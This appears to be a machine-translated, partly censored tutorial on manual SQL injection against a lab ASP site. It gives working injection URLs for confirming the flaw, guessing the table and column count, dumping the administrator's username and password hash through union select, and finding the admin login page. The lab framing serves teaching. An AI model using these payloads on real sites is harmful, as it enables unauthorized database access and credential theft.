How to realize manual SQL injection

SQL injection is one of the common means to * * * database, and its core idea is: * * * construct a database query code behind the URL that normally needs to call database data, and then obtain some desired data according to the returned results. Next, we will use SQL to inject loopholes and attack the built * * * platform to get the account and password of the webmaster. IP address of target server: 192.168.80.129, IP address of * * host: 192.168.80.128.

(1) find the injection point

Open a web page casually and pay attention to the URL.

The injection point must be something like http://192.168.80.129/shownews.asp? Id=7 such pages with command calls, shownews.asp? Id=7 is the page transfer value, that is, id=7 is transferred to the shownews.asp page for processing.

We can test this URL by adding and 1=1 and and 1=2.

http://192.168.80.129/shownews.asp? Id=7 and 1=1, the webpage can still be displayed normally.

http://192.168.80.129/shownews.asp? Id=7 and 1=2, the webpage cannot be displayed normally.

This means that asp? By calling our own and 1=1 as a command parameter, we can construct some SQL statements to be called and executed, so as to get the needed information, which is called injection vulnerability. A web page that can call command parameters like this is called an injection point.

(2) Guess the name of the table

* * * The main purpose of website * * * is to obtain the user name and password of the webmaster, which are stored in a table in the background database, so first we have to guess what the name of this data table is.

The most commonly used table names are admin and admin_user. We can guess the table name by adding a statement like this after the URL of the injection point:

http://192.168.80.129/shownews.asp? id=7 and (select count(*) from admin) > 0

Select count(*) from admin means to count several records in the admin table. If the admin table exists, then this statement will get a numerical value. As long as this value is compared with 0, the result is correct, so the webpage should be displayed normally. On the other hand, if the admin table doesn't exist, then the select count(*) from admin can't get any value. Compared with > 0, the result doesn't hold, and the web page can't be displayed normally.

If the webpage can't be displayed normally, you can try another table name until it is displayed normally:

http://192.168.80.129/shownews.asp? id=7 and (select count(*) from admin_user) > 0

http://192.168.80.129/shownews.asp? id=7 and (select count(*) from manage_user) > 0

The table name of this website is manage_user.

Common table names are: admin sysadmin manger admin 123 web admin membermanage _ user.

Note: If you really can't guess the name of the table, you can also use tools like Ming Xiaozi to help.

(3) Guess the number of fields

The next step is to guess which field in this table holds the user name and password. First, you need to know how many fields there are in the data table.

Order by statement is used here. order by means of sorting by a certain field, and order by 10 means sorting by the 10th field. If the 10th field exists, the webpage will be displayed normally. Otherwise, if the webpage cannot be displayed normally, it means that the 10th field does not exist.

http://192.168.80.129/shownews.asp? id=7 order by 11

In this way, we can guess that there are 11 fields in this table.

(4) Guess the field name

The next step is to know which field holds the user name and password, and the union select joint query statement is used here.

http://192.168.80.129/shownews.asp? id=7 union select 1,2,3,4,5,6,7,8,9,10,11 from manage_user

The field where the user name and password are stored will pop up here.

The field for storing username is generally called username, and the field for storing password is generally called password. Replace the second and third fields with these two names:

http://192.168.80.129/shownews.asp? id=7 union select 1,username,password,4,5,6,7,8,9,10,11 from manage_user

At this time, the user name and password were revealed.

(5) Guess the background management entrance

Version 2.0 of this Southern Data Template already includes a link called Administrator Login. Most websites don't set up like this now, so it is generally necessary to guess by experience here. The management portal is generally stored in a website subdirectory named admin. Enter the following address http://192.168.80.129/admin, and the management portal will be displayed automatically.

You can log in here with the administrator account and password that broke out before, but the password 3acdbb255b45d296 is obviously encrypted by MD5.